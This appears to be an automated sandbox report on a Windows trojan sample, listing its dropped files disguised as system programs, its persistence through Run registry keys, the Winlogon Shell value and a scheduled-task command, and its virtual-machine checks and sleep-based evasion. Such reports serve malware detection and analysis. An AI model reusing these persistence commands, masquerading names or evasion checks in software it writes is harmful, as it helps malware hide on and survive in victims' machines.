                              Source: 4ra1Fo2Zql.exe, M1aS8QKuM4yePZFygnv.csHigh entropy of concatenated method names: 'U3TK6hqSp1', 'V3oKzmGBLS', 'ttGKEpZZMs', 'emeKT22FmE', 'RYJKq8Erac', 'O8nKJmMM46', 'HFqKS0s5WR', 'TjPKVZZrJk', 'L0uKHnmuFA', 'EVyKwl4p22'
                              Source: 4ra1Fo2Zql.exe, bVjfStMY3rChacMXOBv.csHigh entropy of concatenated method names: 'tfmMNwj4Gu', 'yLlMtNrxkb', 'rGXMghWYdy', 'gG1oxJcq4Phu9vi0bly7', 'upLj6McqrBNgWbC8pPEg', 'OG6RE4cqaF60viQXs5V9', 'A5HI7Dcq073xmHkqWE83', 'sfOYoWcqU7H0fYfSJ1Pi', 'no4UNUcqIUtVTAQbDBJT'

                              Persistence and Installation Behavior

                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Users\user\Desktop\xxMkqOtN.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Users\user\Desktop\sTRlxExW.log
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe File created: C:\Users\user\Desktop\CAgBdTQY.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe File created: C:\Users\user\Desktop\myawJPbK.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Users\user\Desktop\fuHfGerv.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Users\user\RuntimeBroker.exe
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe File created: C:\Users\user\Desktop\gwaXxxDZ.log
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe File created: C:\Users\user\Desktop\MjzRNvWG.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe File created: C:\Users\user\Desktop\cPGganVc.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Users\user\Desktop\VTXhBlNT.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Users\user\Desktop\VLoPWCmN.log

                              Boot Survival

                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe File created: C:\Users\user\RuntimeBroker.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrVEPTmsoNTbY
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4ra1Fo2Zql
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Memory allocated: 840000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Memory allocated: 1A4D0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Memory allocated: D40000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Memory allocated: 1A7E0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Memory allocated: 1540000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Memory allocated: 1B350000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Memory allocated: 2240000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Memory allocated: 1A450000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Memory allocated: 1270000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Memory allocated: 1AFD0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: 30C0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: 1B0C0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: B90000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: 1A6A0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exe Memory allocated: 25A0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exe Memory allocated: 1A5A0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exe Memory allocated: 34E0000 memory reserve | memory write watch
                              Source: C:\Users\user\RuntimeBroker.exe Memory allocated: 1B4E0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe Memory allocated: 1250000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe Memory allocated: 1B040000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: DF0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: 1A8A0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: DF0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Memory allocated: 1ADA0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xxMkqOtN.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Dropped PE file which has not been started: C:\Users\user\Desktop\sTRlxExW.log
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CAgBdTQY.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Dropped PE file which has not been started: C:\Users\user\Desktop\myawJPbK.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Dropped PE file which has not been started: C:\Users\user\Desktop\fuHfGerv.log
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gwaXxxDZ.log
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MjzRNvWG.log
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cPGganVc.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VTXhBlNT.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VLoPWCmN.log
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe TID: 5348 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe TID: 7788 Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe TID: 1864 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe TID: 7080 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe TID: 7592 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 7568 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 7608 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\RuntimeBroker.exe TID: 7604 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\RuntimeBroker.exe TID: 7616 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe TID: 7744 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 7768 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe TID: 8124 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2076580924.000000001B759000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2079535829.000000001B7A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `1|pDn-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2197171062.000000001B0B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2192322493.000000001283D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: [Base64-encoded data]
                              Source: w32tm.exe, 0000002C.00000002.2237357810.00000175DBE59000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe; Process token adjusted: Debug
                              Source: C:\Users\user\RuntimeBroker.exe; Process token adjusted: Debug
                              Source: C:\Users\user\RuntimeBroker.exe; Process token adjusted: Debug
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe; Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Memory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat"
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Queries volume information: C:\Users\user\Desktop\4ra1Fo2Zql.exe VolumeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; Queries volume information: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe VolumeInformation
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe; Queries volume information: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe VolumeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Queries volume information: C:\Users\user\Desktop\4ra1Fo2Zql.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Queries volume information: C:\Users\user\Desktop\4ra1Fo2Zql.exe VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe; Queries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe; Queries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Users\user\RuntimeBroker.exe; Queries volume information: C:\Users\user\RuntimeBroker.exe VolumeInformation
                              Source: C:\Users\user\RuntimeBroker.exe; Queries volume information: C:\Users\user\RuntimeBroker.exe VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe; Queries volume information: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe; Queries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe; Queries volume information: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe VolumeInformation
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2197171062.000000001B0B0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
